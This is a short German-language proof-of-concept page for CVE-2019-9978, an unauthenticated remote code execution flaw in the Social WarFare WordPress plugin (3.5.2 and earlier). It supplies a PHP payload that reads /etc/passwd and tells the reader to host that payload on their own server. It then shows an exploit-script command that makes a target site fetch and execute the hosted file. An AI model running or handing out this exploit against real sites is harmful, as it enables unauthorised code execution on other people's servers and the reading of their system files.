
CVE-2019-9978 - (PoC) RCE im Social WarFare Plugin (<=3.5.2)
CVE-2019-9978 - (PoC) RCE im Social WarFare Plugin (<=3.5.2)
Nicht authentifizierte Remote-Codeausführung wurde in der Funktionalität entdeckt, die den Import von Einstellungen verwaltet. Ein Benutzer kann die Verwendung von RFI ausnutzen, um RCE zu erreichen.
Kopiere die folgende Payload:
<pre>system('cat /etc/passwd')</pre>
Speichere sie mit dem Dateinamen: payload.txt und lade sie auf einen Server hoch. Die URI sollte wie folgt aussehen: http(s)://yoursite.com/payload.txt. Gib schließlich deine --target und --payload-uri Optionen an:
$ python cve-2019-9978.py --target http://vulntarget.com \
--payload-uri http://yourpayloadsite.com/payload.txt

Forscher: Luka Sikic
Link: https://wpvulndb.com/vulnerabilities/9259?fbclid=IwAR2xLSnanccqwZNqc2c7cIv447Lt80mHivtyNV5ZXGS0ZaScxIYcm1XxWXM
Autor: @hash3liZer